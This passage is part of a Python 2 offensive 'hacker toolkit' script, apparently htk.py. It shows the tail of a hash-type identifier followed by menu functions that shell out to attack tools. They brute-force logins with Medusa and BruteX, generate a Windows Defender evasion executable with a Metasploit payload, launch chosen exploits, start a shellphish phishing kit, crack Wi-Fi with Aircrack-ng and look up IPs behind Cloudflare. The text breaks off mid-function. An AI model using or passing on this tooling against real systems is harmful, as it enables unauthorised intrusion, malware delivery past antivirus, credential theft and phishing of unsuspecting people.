hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - -#ABOUT ME / THE CREATOR START# -#----------------------------# -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -#--------------------------# -#ABOUT ME / THE CREATOR END# - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = 